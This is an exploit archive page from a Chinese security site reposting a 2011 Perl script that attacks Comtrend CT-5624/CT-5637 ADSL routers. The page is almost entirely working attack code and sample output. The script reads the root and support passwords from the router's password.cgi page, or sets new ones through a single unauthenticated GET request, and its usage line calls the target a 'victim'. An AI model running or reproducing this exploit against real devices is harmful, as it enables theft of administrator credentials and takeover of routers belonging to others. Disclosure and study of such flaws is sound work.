首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Comtrend Router CT-5624 Remote Root Password Changer/Disclosure
来源:todor.donev@@gmail.com 作者:Todor Donev 发布时间:2011-11-09   
#!/usr/bin/perl
#
#  [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit
#
#  Author: Todor Donev
#  Email: todor.donev@@gmail
#  Type: Hardware
#  Vuln Type: Remote
# 
#  Tested:
#  Board ID    : CT-5624
#  Software    : A011-306TSR-C01_R03
#  Bootloader  : 1.0.37-0.7-3
#  ADSL        : A2pB022c3.d20e
#
#  Board ID    : CT-5637
#  Software    : A111-312BTC-C01_R12
#  Bootloader  : 1.0.37-12.1-1
#  ADSL        : A2pB023k.d20k_rc2
#
#####
#  CT-5624 ADSL2+ Ethernet Router
#  The CT-5624 series ADSL2+ compact and high performance Ethernet router 
#  provides four 10/100 Ethernet Interfaces, and one ADSL line interface 
#  to access the Internet, incorporating LAN or Video on Demand over one 
#  ordinary telephone line, at speeds of up to 24 Mbps. It also has full 
#  routing capabilities to segment/route IP protocol, and supports advanced 
#  security functions. 
#####
#
#  playground$ perl comtrend.pl -c 192.168.1.1:80
#  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
#  [!] Target: 192.168.1.1:80
#  [o] New root password: root31337
#  [o] New support password: sup31337
#  [*] Successfully !!
##
#  playground$ perl comtrend.pl -d 192.168.1.1:80
#  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
#  [!] Target: 192.168.1.1:80
#  [o] root: root31337
#  [o] support: sup31337
##
#  playground$ perl comtrend.pl
#  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
#  [!] usg: perl comtrend.pl [-c or -d] <victim>
#  [!]  -d: Disclosure Root/Support password
#  [!]  -c: Change Root/Support password
#
#####
#  Thanks to Tsvetelina Emirska 
#  for the help and support which gives me =)
#####

use LWP::Simple;
print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n";
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-d") {
my $r = get("http://$t/password.cgi") or die("suck!");
print "[!] Target: $t\n";
if ($r =~ m/pwdAdmin = '(.*)';/g) {
$result .= "[o] root: $1\n";
}     
if ($r =~ m/pwdSupport = '(.*)';/g) {
$result .= "[o] support: $1\n";
print $result; 
}}}
if ($type eq "-c") {
print "[!] Target: $t\n";
print "[o] New root password: ";
my $rootpass=<STDIN>;
chomp($rootpass);
print "[o] New support password: ";
my $suppass=<STDIN>;
chomp($suppass);
my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!");
if ($r =~ m/pwdAdmin = '$rootpass';/g) {
print "[*] Successfully !!\n";
}}
sub usg(){
print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n";
print "[!]  -d: Disclosure Root/Support password\n";
print "[!]  -c: Change Root/Support password\n";
exit;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle XDB.XDB_PITRIG_PKG.PITR
·Aviosoft Digital TV Player Pro
·Oracle Hyperion Strategic Fina
·AbsoluteFTP 1.9.6 - 2.2.10 Rem
·Linux Kernel 2.6.11 Local root
·AbsoluteFTP 1.9.6 - 2.2.10 Rem
·glibc LD_AUDIT arbitrary DSO l
·KnFTP 1.0 Buffer Overflow Expl
·Soda PDF Professional 1.2.155
·MS11-021 Microsoft Office 2007
·Calibre E-Book Reader Local Ro
·MS11-083 Denial Of Service
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved